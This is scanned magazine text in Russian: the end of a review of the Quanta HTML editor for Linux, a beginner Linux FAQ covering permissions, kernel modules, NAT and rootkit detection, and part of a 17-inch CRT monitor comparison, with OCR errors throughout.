Сама Quanta весит немного (~3mb), 
но требования пакетов KDE автома- 
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Интерфейс Quanta 


тически увеличивают объем ‹фай- 
лов, необходимых для установки 
Quanta. Но не все так плохо. Во-пер- 
вых, KDE есть в большинстве дист- 
рибутивов, да и Quanta в дистрибу- 
тивах встречается достаточно часто. 
Также стоит отметить, что приме- 
нение Quanta не ограничивается 
только Линуксом. Ее применение 
возможно на всех тех никсах, на ко- 
торые портирована КПЕ. С полной 
уверенностью могу сказать о рабо- 
те Quanta Ha Linux, FreeBSD, 
OpenBSD, NetBSD. На других систе- 
мах не проверял, в связи с их ма- 
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лой распространенностью в качест- 
ве десктопов. 

Качай архив Quanta с любого из 
серверов проекта KDE (их список 
можно найти на сайте http://www. 
kde.org). Установка из исходников че- 
рез стандартные команды: ./configure, 
make, make install, после чего прог- 
рамма установлена и готова к работе. 

Запускай программу командой 
quanta в командной строке. Если 
команда не будет найдена, укажи 
полный путь, который можно уз- 
нать, набрав “whereis quanta”. 

Сейчас перейдем непосредственно 
к рассмотрению возможностей редак- 
тора. После запуска перед нами по- 
является рабочее окно редактора, 
разделенное на две части. Левая 
часть состоит из нескольких вкладок, 
среди которых вкладка просмотра де- 
рева каталогов, вкладка просмотра 
файлов проекта, окно шаблонов, 
просмотр ВОМ-структуры (Dynamic 
Object Model), а также вкладка окош- 
ка справочной информации. 

Во второй, правой части рабочей 
области программы мы также видим 
несколько вкладок, содержащих 
структурные элементы HTML доку- 
мента и призванных упростить ре- 
дактирование/создание кода. Вклад- 
ка Standart содержит кнопки базо- 
вых тегов. Названия вкладок Fonts, 
Tables, Lists, Forms говорят сами за 


себя. При нажатии на кнопку какого- 
либо элемента в главном рабочем 
поле будут появляться соответству- 
ющие теги. Для некоторых тегов бу- 
дут выводиться диалоговые окошки 
с запросом параметров. 

Над двумя рабочими областями 
программы находится несколько па- 
нелей меню: стандартное меню ко- 
манд приложений КПЕ, а также две 
панели с командами Quanta. На них 
находятся кнопки перемещения 
между действиями, кнопка предва- 
рительного просмотра страницы в 
браузере, кнопки навигации по 
ссылкам просматриваемой страни- 
цы, а также довольно интересная 
кнопка, позволяющая просматри- 
вать логи произведенных действий 
в специально появляющемся подок- 
не, внизу рабочего поля программы. 


К ДЕЛУ, ГОСПОДА! 
Итак, открываем документ, который 
мы хотим редактировать, или выби- 
раем создание нового чистого доку- 
мента через меню “File” > “New”. Так- 
же Quanta позволяет создать непос- 
редственно проект в отдельной ди- 
ректории с определенным набором 
связанных файлов. Удобный визард 
позволяет задать каталог для проек- 
та, его название, параметры связи с 
сервером, кодировку страниц, доба- 
вить необходимые срайлы, а также 
воспользоваться шаблонами и выб- 
рать стандарт, в соответствии с кото- 
рым будет проверяться валидность 
создаваемых документов. 
Порадовали возможности админи- 
стрирования создаваемого сайта. От- 
дельно стоит отметить выбор прото- 
колов и режимов для работы с серве- 
ром. Среди них local - работа с ло- 
кальным каталогом машины, ftp - в 
комментариях не нуждается, Sftp - 
секьюрная передача файлов по про- 
токолу ssh (тут ты можешь быть пол- 
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Просмотр DOM структуры 


ностью спокоен за передаваемую ин- 
формацию и пароли), smb, nfs и даже 
Норру - режим работы с дискетой; 
также есть возможность работать че- 
рез CVS, что весьма важно при расп- 
ределенной разработке сайта. 

Естественно, что сразу можно за- 
дать пароль, хост и порт для входа 
на сервер. Таких богатых возмож- 
ностей для связи с сервером я не ви- 
дел ни в одном виндовом редакторе. 

Работать с параметрами каждого 
проекта можно при помощи команд 
из меню Projects. В частности, 
пункт Project Options позволяет из- 
менить свойства текущего проекта; 
Insert files и Insert Directory - доба- 
вить к проекту соответственно 
файл или директорию. Все осталь- 
ные пункты этого меню также инту- 
итивно понятны и не вызовут слож- 
ностей с их применением. 

Quanta поддерживает основные 
необходимые спецификации: HTML 
4.01, WML, XSLT, XHTML, а также 
РНР. К сожалению, я не обнаружил 
в Quanta поддержки спецификаций 
XML (Extensible Markup Language). 
Конечно, на данный момент это не 
очень критично, но, учитывая воз- 
растающую роль этого языка логи- 
ческой разметки, поддержка специ- 
фикаций не была бы лишней. 

Но опять же повторю, что на дан- 
ный момент это не так страшно. По- 
хоже, Quanta не поддерживает син- 
таксис такой полезной и тесно свя- 
занной с HTML штукой, Kak CSS 
(Cascade Style Sheet), вот тут 
действительно значительный минус 
- можно было бы просто ограни- 
читься подсветкой синтаксиса CSS. 

Весьма удобной показалась воз- 
можность редактора отображать 
структурное дерево элементов DOM 
редактируемого документа. В левой 
части рабочего окна программы 
отображается дерево элементов 
документа в соответствии со сте- 
пенью их вложенности. Структур- 
ное дерево DOM позволяет не 
только сделать структуру докумен- 
та очень наглядной, но также суще- 
ственно облегчает навигацию по 
редактируемому коду и позволяет 
избежать ошибок, связанных с на- 


рушением структуры документа. 
Что касается ошибок. Подсветка 

синтаксиса в значительной степени 

уменьшает вероятность ошибок с 


Продвинутый визард для задания 
свойств проекта 


закрытием парных тегов и в случае 
их совершения, позволяет с лег- 
костью их обнаружить и исправить. 
Также в программу встроен чекер 
синтаксиса, дабы помочь веб-мастеру 
найти и исправить совершенные 
ошибки. Еще одна полезная функция 
- автоподстановка тегов. При правке 
кода и добавлении новых тегов авто- 
матически появляется менюшка с 
возможностью выбора тегов. Польза 
этой фишки очевидна: во-первых, не 
нужно помнить все теги HTML (хоть 
это и не очень сложно), так как всег- 
да найдется оперативная подсказка; 
во-вторых, выбранные теги всегда 
будут правильными; ну и в-третьих, 
ты можешь вспомнить о тегах (если 
ты их забыл :)), использование кото- 
рых более предпочтительно, нежели 
тех, которые ты задумал изначально. 


РАСХОДИМСЯ 
Отмечу, что Quanta не является визу- 
альным редактором по типу WYSIWYG, 
то есть с непосредственным построе- 
нием страницы с помощью мышки. 
Quanta - это среда для разработки 
НТМЕ-документов, достаточно серьез- 
ная, чтобы использовать ее для значи- 
тельных проектов. Quanta не удастся 
использовать без базового знания 
HTML, так как тебе придется непосред- 
ственно редактировать код документа. 
Говорить о чистоте кода здесь не 
приходится, так как программа сама 
ничего не генерирует, она лишь по- 
могает разработчику. Здесь все зави- 
сит от кодера. Но, имхо, в любом слу- 
чае ручной код будет чище, нежели 
код, сгенерированный программой. 
Даже самые продвинутые виндовые 
редакторы генерируют далеко не са- 
мый чистый код, что уж говорить о 
более слабых представителях. 
Базовые понятия HTML можно 
изучить за пару дней, и, в дальней- 
шем совершенствуясь, ты легко из- 
бежишь мусора в коде своих стра- 
ничек, а следовательно, у тебя бу- 
дет хорошая возможность умень- 
шить их объем, что весьма важно 
на медленных каналах, да и лиш- 
ний трафик никому не нужен. 
Кажется, теперь ты должен с лег- 
костью начать писать свои паги под 
Линухом, да и средство для этого 
есть, причем весьма неплохое. 
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Подсветка син- 
таксиса в зна- С 
чительной сте- 
пени уменьша- 
ет вероятность 
ошибок с зак- 
рытием пар- 
ных тегов и в 
случае их со- 
вершения, поз- 
воляет с лег- 
костью их об- 
наружить и 
исправить. 


Проверить 
свой документ 
на валидность 
можно и через 

интернет 

по линку 
http://w3c. 
org/validator. 
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сли кто не в курсе, 
FAQ - Frequently 
Asked Questions (ЧаВо - 


часто задаваемые 
вопросы). Эта рубрика 
позволит закрепить 
полученные хакерские 
знания, прояснить 
непонятные термины, 
узнать тонкости. 


FAQ THE 


Vitls (vitls@chat.ru) 


Что такое "дистрибутив"? 


Дистрибутив - это набор, в состав которо- 
го входит ядро операционной системы и 
сборник различных приложений. Очень 
часто компании, разрабатывающие и соп- 
ровождающие тот или иной дистрибутив, 
включают в него свои собственные ориги- 
нальные разработки. Фактически - это го- 
товый к распространению и использова- 
нию (коммерческий) продукт с системой 
установки и настройки. Известные изгото- 
вители дистрибутивов: Red Hat, SuSE, 
Mandrake, Turbo Linux, Connectiva (6yp- 
жуйские) и ALT Linux, ASP Linux, Black Cat 
(наши). Сайт, посвященный дистрибути- 
Bam Linux: www.distrowatch.com. 


Можно ли запускать про- 
граммы для Windows под 
Linux? 


Можно. Но для этого нужно воспользо- 
ваться либо виртуальной машиной, либо 
эмулятором. Виртуальная машина - это 
программа, запустив которую, ты получа- 
ешь возможность установить другую опе- 
рационную систему "внутри" уже установ- 
ленной. Самый известный продукт 
VMware (программа платная, бесплатный 
ключик дается на месяц). Далее идут 
win4lin (тоже платная) и Bosch (свобод- 
ная). Кроме того, существуют програм- 
мные комплексы Wine и wineX (поддержи- 
вает 30), которые, не являясь эмулятором 
Windows, все же дают возможность поль- 
зоваться "виндовыми" приложениями. 


А наоборот? 


Вот тут чуточку сложнее. VMware есть и 
для Windows. Есть такие варианты, как 
Cygwin - набор библиотек для запуска 
XFree86 под win32. Есть также набор ути- 
лит unix для win32, но это лишь самая ма- 
лая часть того, что доступно при работе в 
самой unix-like системе. 


Что такое "консоль"? 


Когда-то давно ввод в комп осуществлял- 
ся через клавиатуру, а вывод - на печата- 
ющее устройство. Дисплеев не было. Сей- 
час консолью называют клаву + дисплей. 
В Linux у тебя может быть до 12 независи- 
мых друг от друга консолей (виртуальных 
терминалов) на одной паре "клавиатура- 
дисплей". Кроме того, к одному Linux-cep- 
веру можно подключить несколько уда- 
ленных бездисковых станций (термина- 
лов). Более подробно читай на 
www.ltsp.ru. Еще можно установить соеди- 
нение с Ипих-сервером посредством про- 
токолов telnet или ssh. В каждой консоли 


пользователю дается возможность вво- 
дить команды и выполнять приложения. 

За реакцию на действия пользователя отве- 
чает программа, которая, в общем, называет- 
ся shell (названия: sh, ash, bash, ksh, tcsh, zsh 
и много других). Роль shell в win32 выполня- 
ют программы Command.com или cmd.exe, но 
их возможности очень ограничены. 

Кстати, shell предоставляет также и язык 
программирования, на котором можно пи- 
сать небольшие программки-сценарии. От- 
даленным аналогом являются .bat файлы 
в Windows. 


|? || Что такое /dev и зачем он 
нужен? Что такое файл 
устройства? 


В любой unix-like системе любые устрой- 
ства представлены как файлы. Не удив- 
ляйся, это так. Сканеры, плоттеры, мышки, 
клавиатуры, жесткие диски - все Npegc- 
тавлено в виде файлов. Все файлы уст- 
ройств собраны в каталоге /dev. Имя фай- 
ny дает драйвер устройства. Например, 
/dev/hda означает первый жесткий диск 
на первом ide контроллере. Соответствен- 
но, в документации к ядру Linux есть спи- 
сок наиболее часто используемых фай- 
лов устройств. 


Расскажи про организа- 
цию файловой системы? 


В Linux, как и в любой другой unix-like сис- 
теме, файловая система организована в ви- 
де дерева с единственным корнем (обозна- 
чается как /). В win32 на каждое устройство 
хранения данных есть свой корень (напри- 
мер, с:\). В Linux все устройства хранения 
данных, которые мы хотим использовать в 
системе, должны быть "прикручены" к су- 
ществующему "дереву". Такой процесс на- 
зывается монтированием. Команда mount -t 
vfat /dev/hddl /mnt/disk_d означает, что 
первый раздел на устройстве slave второго 
ide контроллера (/dev/hddl) имеет файло- 
вую систему vfat и будет "присандален" к 
нашей файловой системе в каталог 
/mnt/disk_d. После выполнения этой коман- 
ды я могу перейти в каталог /mnt/disk_du 
получить доступ к файлам на смонтирован- 
ном диске. 


Права доступа? 


В Ипих существует встроенная система 
разграничения прав доступа к файлам и ка- 
талогам. Ее главная цель - оградить систе- 
му от действий пользователя, могущих при- 
вести к потере информации или к нежела- 
тельному обладанию некоторыми данными. 
В системе есть группы пользователей и 
пользователи. Администратору позволено 
все. Остальные ограничены теми правами, 


которые раздаст им администратор. 
Есть права на чтение-запись-выпол- 
нение. А по принадлежности права 
делятся на владелец - группа - ос- 
тальные. Понятие "группа" означает, 
что права на те или иные действия с 
файлом\каталогом разрешены груп- 
пе, членом которой является поль- 
зователь. 

Система разделения прав несколь- 
ко отличается от того, что есть в 
WindowsNT и ей подобных. Но в сво- 
ем нынешнем виде она вполне 
справляется с 90% задач по разгра- 
ничению доступа. 


Что такое 
"списки доступа"? 


Списки доступа (ACL, Access 
Control List) - это фича некоторых 
типов файловых систем, например, 
XFS, которая позволяет гибче уп- 
равлять доступом к объектам Cpai- 
ловых систем. ACL дает возмож- 
ность указать конкретному пользо- 
вателю, с какими объектами он мо- 
жет работать (и как именно рабо- 
тать), а с какими - нет. При совмест- 
ной работе с традиционными Cpeg- 
ствами разграничения доступа по- 
лучается эффект мощной и гибкой 
системы раздачи прав. 


@] Что такое модуль ядра? 


Ядро Linux умеет динамически подк- 
лючать или отключать драйвер того 
или иного "железа" твоей системы. 
Для этого драйвера оформляются в 
виде отдельных подпрограмм. Вот 
они-то и называются "модулями". 
Командами insmod, modprobe можно 
подключить нужный модуль. После 
чего устройство будет способно к ра- 
боте. Даже перегружаться нет необ- 
ходимости (хотя бывают исключе- 
ния). Команда rmmod удалит нужный 
модуль из памяти. Многие фирмы 
выпускают драйвера для Linux к сво- 
им изделиям в виде модулей. 


[2 |] Как настроить звук 
и винмодемы? 


Если твоя "звуковуха" поддержива- 
ется ядром, то ты сможешь ее наст- 
роить. Прежде всего, много звуко- 
вых карт настраивается программой 
soundconf (или sndconf). Если нет - 
карту, скорее всего, можно настро- 
ить, заюзав доки и соответствующие 
модули. В Linux есть несколько раз- 
ных подсистем, отвечающих за рабо- 
ту со звуком. Две из них - Oss и alsa 
(www.alsa-project.org) - входят в 
состав ядер. Аба более сложна в ис- 
пользовании и установке, но она 
поддерживает большинство новинок 
и более современна. Кучу полезных 
советов найдешь на WWW.atmsk.ru. 
В винмодеме основную работу по 
управлению соединением выполняет 
операционная система. На сайте 


www.linmodems.org есть полная 
инфа о том, какие винмодемы рабо- 
тают в Linux, а какие нет. 


А есть в Linux 
программы Word, 
Photoshop и T.g.? 


Нет. ЭТИХ программ gna Linux нет. 
Зато у тебя есть сайт Www.linux 
shop.ru/linuxbegin/win-lin-soft/, на 
котором собрана наиболее полная 
информация по вопросу соответ- 
ствия друг другу программ Linux и 
Windows. Некоторые из перечислен- 
ных там программ - коммерческие и 
стоят немалых денег. 


Как мне подключить 
локальную сеть, 
имея один компью- 
тер, подключенный 
к Интернету? 


В windows98 это делается методом 
Connection share, то есть средства 
разделения доступа встроены в сис- 
тему. Минусом является то, что это 
абсолютно медленная и тупая штука. 
Более гибкое управление требует 
наличия программ вроде WinRoute 
или WinGate. WindowsNT, ХР и 2000, 
2003 имеют еще более продвинутые 
средства. На их изучение тебе потре- 
буется потратить какое-то время. 
Если выход в Сеть имеет машина с 
Linux, то Ha ней запускается прог- 
рамма трансляции адресов. На систе- 
мах с ядрами серии 2.2.х программа 
называется ipchains, на ядрах 2.4.x - 
iptables. По последней тулзе есть 
прекрасное руководство, лежащее 
на сайте http://gazette.linux.ru.net/ 
rus/articles/iptables-tutorial.html. 


Что такое МАТ? 


РАО/ЕАО THE WORK! 


ми) и прога route для простой стати- 
ческой маршрутизации. Для более 
изысканной работы можно исполь- 
зовать пакет iproute2. На сайте 
www.linuxrouter.org есть информа- 
ция по созданию маршрутизаторов 
на основе Linux. 


А что, под Linux нет 
вирусов? 


Есть, но они практически неработос- 
пособны. Ведь для серьезных дест- 
руктивных действий нужны права су- 
перпользователя, а потому, если не- 
осторожный пользователь запустил 
вирус от своего имени, то потеряется 
лишь его собственная инора. Систе- 
ма останется нетронутой. Вот почему 
вести повседневные дела от имени 
администратора системы строжайше 
запрещено. Надо быть конченным 
идиотом, чтобы от пользователя root 
собирать и выполнять программы из 
незнакомых источников. 

Для Linux есть и антивирусные 
программы. Самые лучшие - наши 
www.drweb.ru и www.kav.ru. 


Как бороться с "тро- 
янами" nog Линь? 


Под Linux "трояны" чаще всего уста- 
навливают набор, который дает зло- 
дею удаленный доступ к системе. 
Rootkit заменяет стандартные утили- 
ты контроля процессов (ps, netstat, 
{ор), чтобы его нельзя было обнару- 
жить, а потом открывает сетевой 
порт и ждет, пока с ним соединится 
хацкер. Обнаружить трои можно с 
помощью программы с 
http://www.chkrootkit.org. После 
обнаружения лучше всего переуста- 
новить систему. Хоть это и неприятно. 


Где про это читать? 


МАТ - Network Address Translation - 
преобразования адресов сети. Cpeg- 
ство маскировки |IP-agpecoB одной 
сети адресами другой сети. Применя- 
ется чаще всего для выпуска ло- 
кальной сети конторы в Инет. Но, на 
самом деле, есть еще огромная куча 
применений в области сетевой безо- 
пасности. 


Говорят, что на 


Linux можно постро- 
ить недорогой марш- 
рутизатор? 


Правильно говорят. Linux прекрасно 
работает на системах с процессора- 
ми 1386 и выше. Есть дистрибутивы, 
которые состоят из одной-двух дис- 
кет объемом 1.44 Мб и включают в 
себя минимальный набор программ 
для построения маршрутизатора. А 
надо-то: ядро с поддержкой сетевой 
подсистемы (драйвер сетевой карты, 
протоколов tcp/ip и прочими веща- 


1. Kernel-HOWTO 

2. Linux 2.4 Packet-filtering-HOWTO 
(http://www.linux.org.ru:8100/ 
books/HOWTO/index.html!) 

3. Iptables-HOWTO 
(http://www.linuxguruz.org/ 
iptables/howto/iptables- 
HOWTO.html) 

4. Firewall-HOWTO 
(http://linuxdocs.org/HOWTOs/ 
Firewall-HOWTO.html) 

5. NAT-HOWTO 
(http://imc.edu.trekhgorny.ru/ 
~merlin/iptables/NAT- 
HOWTO.linuxdoc.html) 

6. Netfilter-hacking- HOWTO 
(http://www.netfilter.org/docu- 
mentation/HOWTO/netfilter- 
hacking-HOWTO.html) 

7. Iptables-tutorial 
(http://gazette.linux.ru.net/rus/ 
articles/iptables-tutorial.html) 
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убрика HARD - это 

тесты и обзоры 
железа, описание и раз- 
бор самых передовых 
хардверных технологий, 
а также радиолюбимая 
радиорубрика всех радио- 
любителей и электрон- 
щиков - Паяльник Док- 
тора Кода. 


Content: 


САМЫЕ ИНТЕРЕСНЫЕ 
СЕМНАШКИ 


тест 17" СВТ-мониторов 


test_lab 
(test_lab@gameland.ru) 


test_lab выражает благодарность за предоставленное Ha тес- 
тирование оборудование компаниям CITILINK (т. 745-2999), 


"Остров Формоза" (т. 728-4004) и ОЛДИ (т. 105-0700). 


а рынке мониторов сейчас 

очень интересная ситуация. На- 
бирают популярность жидкокристаллические 
модели, в результате чего дешевеют элект- 
роннолучевые. Это приводит к тому, что неве- 
роятные пару лет назад 19-дюймовые CRT ста- 
новятся все более доступными! Однако у юз- 
веров есть куча причин для покупки 17-дюй- 
мовых: небольшие размеры, скромная цена, 
отсутствие потребностей в 19-ти дюймах. Вот 
мы и решили надыбать для тебя самые вкус- 
ные семнашки, чтобы ты не облажался при 
выборе моньки. 


МЕТОДИКА ТЕСТИРОВАНИЯ 

Мы подключали мониторы к видеоразветви- 
телю, чтобы отображать тесты из набора 
Nokia Monitor Test одновременно на несколь- 
ких дисплеях. 

Колориметр PANTONE ColorVision SpyderPRO 
с программным обеспечением OptiCAL позво- 
лил оценить цветопередачу. В идеале график 
цветопередачи должен быть прямой линией, 
это параболы со степенью "гамма". Потому 
грасфик и называют цветовой "гаммой". От 
степени зависит кривизна параболы, и чем 
меньше кривизна, тем естественнее передача 
цвета. Неравномерность передачи цветов де- 
лает изображение кислотным и неестествен- 
ным. Меньшая цветовая температура соотве- 
тствует дневному освещению (6500К), а 
большая (9300К) - холодному отблеску снега. 
Прежде всего, мы обращали внимание на по- 
лосу пропускания видеоусилителя, от кото- 
рой зависит максимальное разрешение и 
частота кадров. Для комфортной работы за 
монитором требуется минимальная кадровая 
развертка в 85 Гц. А чтобы мерцания не бы- 
ли видны краем глаза, необходима частота 
100-110 Гц. Если высоковольтный преобразо- 
ватель дешевый и слабый, то при изменении 
яркости картинки изображение меняет раз- 
мер и геометрию. 


Что мы видим Г 


на графиках? 


На графиках мы изобразили скоррек- 
тированную цветопередачу. То есть мы 
взяли параболу со степенью «гамма», 
применили обратную функцию и долж- 
ны были в идеале получить прямую ли- 
нию из одного угла в другой. Но тут-то 
и вылезло много интересных вещей... 
Для каждого цвета RGB свой грасрик. А 
стандартная цветопередача монитора 
отмечена синей параболой. 


ОЕ тестируемого | 


оборудования: 


LG FLATRON ez T710BH 

LG FLATRON F700P 

LG FLATRON F795FT Plus 
CTX PR705F 

NEC FE791SB 

SONY Multiscan E250 
SAMSUNG SyncMaster 757NF 
SAMSUNG SyncMaster 757MB 


Вне конкурса 


LG FLATRON ez T710BH 


Цена: $165 

Диагональ: 17" 
Максимальное разрешение: 
1280x1024 (66Гц) 
Сведение: 4 балла 
Фокусировка: 4 балла 
Видеоусилитель: 3 балла 
Муар: 3 балла 


В этой статье собраны мониторы, пози- 
ционируемые как профессиональные. Og- 
нако не забывай, что есть и разумная аль- 
тернатива по более выгодной цене! В ка- 
честве примера мы взяли новый монитор 
LG FLATRON ez T71OBH. Он соответствует 
главному и необходимому требованию: 
держит 1024Х768 на эргономичных 85-ти 
Герцах! Максимальная вертикальная раз- 
вертка 160 Герц. Система для монитора та- 
кого класса очень даже неплохая, изобра- 
жение меняет размеры в зависимости от 
яркости незначительно. Цветопередача и 
цветовая температура приемлемы, но мы 
не стали на этом заостряться. LG FLATRON 
ez T710BH обладает встроенной функцией 
BrigtWindow, которая позволяет настраи- 
вать яркость, контрастность и другие па- 
раметры определенной области на экране. 
Также имеется возможность сохранять 
настройки монитора в виде профилей. В 
LG FLATRON ez T710BH оптимально соче- 
таются цена и качество! 


G FLATRON F700P 


Максимальное раз- 
решение 1600X1200, 
при этом LG FLATRON 
F7OOP держит целых 
75 Герц. Но вряд ли 
кому-то придет в го- 
лову шальная мысль 
работать с такими 
разрешениями на 
семнашке. Соответ- 
ственно вертикаль- 
ная развертка полу- 
чается от 50 go 160 
Герц. Неплохая поло- 
са пропускания 203 
смехагерца, обеспе- 
чивает четкость изоб- 
ражения. На монито- 
рах с применением 
технологии FLATRON 
нет нитей, придержи- 
вающих маску. Тоже 
идет в плюс, хотя на 
мониторах с нитями 
у оные практически не- 
заметны. 

Заметим, что LG 
FLATRON F7OOP от- 
лично справляется с 
геометрией на плос- 
ком экране. Фокус, 

: конечно, не идеален, 
i зато равномерен, что 
тоже удается далеко 
не всем мониторам. 
Один из самых муарных мониторов. При тестировании 
высоковольтной системы изображение ведет себя 
достаточно стойко, хотя геометрия чуть-чуть все-таки 
изменяется. 

Наш колориметр показывает практически идеально 
ровные графики для трех цветов. На низкой яркости 
есть, конечно, маленькая ступенька, но незначитель- 
ная. Недаром LG FLATRON Е700Р профессионалы хва- 
лят за хорошую цветопередачу. Однако чтобы насла- 
диться этой клевой цветопередачей, тебе обязательно 
придется установить цветовой профиль монитора. LG 
FLATRON F7OOP передает цвета равномерно (это кру- 
то), однако линейность все-таки страдает (это не кру- 
то, но легко исправляется цветовым профилем, если 
все в порядке с равномерностью). Для решения этих 
проблем в комплекте имеется специально ПО. Гамма у 
этого дисплея, конечно, великовата, и без установки 
профиля с диска это скажется! К монитору нужно обя- 
зательно ставить дрова! 

Колориметр также рекомендует покрутить цвета пе- 
ред использованием монитора, поскольку задран зе- 
леный цвет. Обещанные 9300 кельвинов мы намерили 
как 9100, с учетом погрешности - это просто велико- 
лепный результат! То есть LG FLATRON Е7ОО0Р показы- 
вает самый правильный белый! 

Надо отметить компактность монитора и современ- 
ный космический дизайн. Компактность, кстати, для 
многих важна, ведь электроннолучевой приятель спо- 
собен влегкую занять половину твоего рабочего сто- 
ла. Из изысков дизайна также полезен USB-xa6 на че- 
тыре устройства, это оценят обладатели средних 
компьютеров, на которых УЗВ-разъемов обычно не 
хватает. Кстати, такой хаб позволит подключить USB- 
крысу и USB-KnaBy прямо к дисплею, а не тянуть их к 
далекому системному блоку. 


Цена: $190 
Диагональ: 17" 
Максимальное разрешение: 


Фокусировка: 4 балла 
Видеоусилитель: 4 балла 
Муар: 3 балла 


| 


1 at EB 7” 


G TRON 795FT PLUS 


к 


Цена: $200 

Диагональ: 17" 
Максимальное разрешение: 
1600X1200 (75Гц) 


Сведение: 5 баллов 
Фокусировка: 4 балла 
Видеоусилитель: 4 балла 
Муар: 3 балла 
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Ну а это достаточно 
известный и успешный 
предшественник LG 
FLATRON Е7ООР. 
Собственно, LG FLA- 
TRON Е7ООР призван 
заменить LG FLATRON 
795FT Plus, ogHako LG 
FLATRON 795FT Plus go 
сих пор можно встре- 
тить во многих магази- 
нах, да еще и по завы- 
шенной цене - благода- 
ря большой популяр- 
ности. Не удивительно, 
ведь этот дисплей соб- 
рал немало наград и у 
нас, и за бугром. 

Смотрим и видим: 
разрешение 
1600X1200 на 75 Гер- 
цах, 203 мегагерца 
полосы пропускания, 


дюму 10 


|160 Герц вертикаль- 


ной развертки. Тесты 
фокусировки, муара, 
геометрии и высоко- 
вольтной системы 
также повторяют ре- 
зультаты LG FLA- 
TRON F7OOP. 

Однако колориметр 
показывает чуть-чуть 
более аккуратные гра- 
фики и тот же перекру- 


ченный зеленый цвет. А вот цветовую температуру мы на- 
мерили более низкую: 8840 Кельвинов (а обещают 9300). 
Также имеется USB-xa6, меню более удобное. Однако 
LG FLATRON 795FT Plus достаточно громоздкий и места 
на столе займет явно больше, чем LG FLATRON F7OOP. 


Невысокая полоса пропускания, всего 180 мегагерц 
подводит CTX PR7O5F, видимо, с этим связаны неко- 
торые проблемы с фокусом и с муаром. Тем не менее 


Sepa beeps 


высоковольтная сис- 
тема в порядке - 
изображение стоит 
как вкопанное и не 
дергается при изме- 
нении яркости. Реа- 
лизованы большие 
частоты вертикаль- 
ной развертки (go 
160 Герц), но не надо 
забывать, что узкая 
полоса пропускания 
может свести на нет 


эти преимущества. 
На графике, выдан- 
ном колориметром, 


Цена: $210 
Диагональ: 17" 
Максимальное 
разрешение: 
1600X1200 (68Гц) 
Сведение: 5 баллов 
Фокусировка: 3 балла 
Видеоусилитель: 3 балла 
Муар: 3 балла 
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видны просто ужасные скачки на невысокой яркости. 
То есть в темных частях изображения можно ждать 
непредсказуемых явлений с цветом. В остальном цве- 
топередача в норме. Гамма выше средней, экран отда- 
ет в желтый, поскольку цветовая температура низко- 
вата: 7760 Кельвинов. 

Дизайн CTX PR7O5F бедный, а корпус громоздкий и 
угловатый. 


МЕС FE791SB пора- 
жает воображение 
своим дизайном в 
стиле ретро. Кстати, 
такие квадратные 
формы очень удобны 
в использовании, 
например, на плоский 
верх можно положить 
какой-нибудь стафор, 
как на полку. 

Полоса пропускания 
в 210 мегагерц обес- 


печивает приемле- 


П ote 5 : мую четкость изобра- 
О ЕВЕ жения. Приятно так- 
80x1024 (8 же то, что при разре- 
agence 4 бегпЕ шении 1024X768 NEC 
Фо ЭНИЕР 4) GARE FE791SB заводится на 
Видео эп? & Garner 116 мегагерц. 


На колориметре мы 
видим среднюю кри- 
визну параболы цве- 
топередачи и практи- 
чески идеально пря- 


мые графики скор- 
| ректированных трех 
| цветов. С белоснеж- 


ностью экрана все то- 
же неплохо: 810 
Кельвинов. 

Не обошлось и без 
фирменных техноло- 
гий! Функция 


re BS 


SuperBright позволя- 


ет одним нажатием кнопки переключить дисплей в ре- 
жим просмотра графики и видео, увеличив яркость. 
Для цветокоррекции используется утилита AccuColor. 
А программа NaViSet позволяет настраивать моньку с 
помощью мыши и клавиатуры. 

Словом, этот монитор тоже будет неплохим выбором, 
хотя и не самым дешевым. 


SONY MULTISCAN E250 


Если смотреть толь- 
ко на возможности и 
технические характе- 
ристики, то SONY 
Multiscan E250 - луч- 
ший монитор в нашем 
обзоре. Мощная сис- 
тема развертки поз- 
воляет заводиться на 
р разрешениях 
1280X1024 (91Гц) и 
1024X768 (121Гц). Мак- 
симальная частота 


вертикальной разве- 
ртки 170 Герц, а He 160, как у остальных монек. Картин- 
ка четкая, геометрия выглядит отлично, изображение 
не дергается при смене яркости. Полосу пропускания 
SONY, видимо, скрывает (в документации нам ее найти 
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не удалось), по ощу- 
щениям это не мень- 
ше 250 смехагерц! 


Колориметр также 

i ' радует глаз: у SONY 
Multiscan E250 цвето- 

| передача идеальна - 


прямые коррекции 
всех трех цветов без 
единой помарочки 
идут из одного угла в 
другой, при этом не 
сильно расходятся. 
Гамма минимальная, 
график действитель- 
но четкая парабола 
без отклонений. Эк- 
ран белоснежный 
8150 Кельвинов, хо- 
рошие заводские 
настройки. 

Дизайн тоже не подкачал, удобный джойстик позволя- 
ет быстро лазать по хорошо структурированному меню. 
Всем хорош монитор, но посмотри на цену. Ведь за эти 
деньги можно купить среднюю девятнашку. Зачем тебе 
суперсемнашка, когда можно купить приемлемую девят- 
нашку? Непонятно! На этот раз инженеры SONY переста- 
рались, но гурманы все равно, как всегда, найдутся. 


Цена: $260 

Диагональ: 17" 
Максимальное разрешение: 
1600x1200 (75Гц) 
Сведение: 5 баллов 
Фокусировка: 5 баллов 
Видеоусилитель: 5 баллов 
Муар: 5 баллов 


SAMSUNG SYNCMASTER 


Полоса пропускания 
у SAMSUNG 
SyncMaster 757NF 250 
_ | мегагерц. Это един- 

_ | ственный монитор в 

” | обзоре, у которого от- 
’ | соединяется шнур - 
что очень удобно. 
Причем кроме обыч- 
ного \/СА-кабеля мож- 
но использовать коак- 
сиальный gna улуч- 
шения качества изоб- 
ражения, у других 
семнашек мы такой 
возможности не наш- 
ли. Дисплей действи- 
тельно абсолютно 
плоский. Фокус очень 
четкий, но недостаточ- 
но равномерный, эк- 
ран муарит. Высоко- 
вольтная система неп- 
лохая, однако из-за 
исключительной плос- 
кости экрана по краям 


Цена: $230 

Диагональ: 17" 
Максимальное разрешение: 
1920x1440 (64Гц) 


Сведение: 5 баллов 
Фокусировка: 4 балла 
Видеоусилитель: 4 балла 
Муар: 4 балла 


Г можно найти геомет- 
рические искажения. 
| Копориметр показы- 
вает самую малень- 
кую гамму в обзоре. 
Кривизна параболы 
минимальна, однако 
= неравномерна, поэто- 
ы нь 1 | му на графике видны 


два перегиба, которые, правда, совсем не мешают в ра- 
боте. Цвет экрана просто ледяной и чуть-чуть отдает в 
синеву, ведь цветовая температура 9560 Кельвинов, 
хотя должно быть 9300. 

Фирменная технология HighlightZone || позволяет наст- 
роить цвет, яркость и контрастность для определенной 
области экрана. Причем размеры и положение такой яр- 
кой зоны можно менять. Это очень удобно, если ты рабо- 


таешь с графикой или видео. Для того чтобы лучше pac- 
смотреть картинку, не придется выкручивать яркость всего 
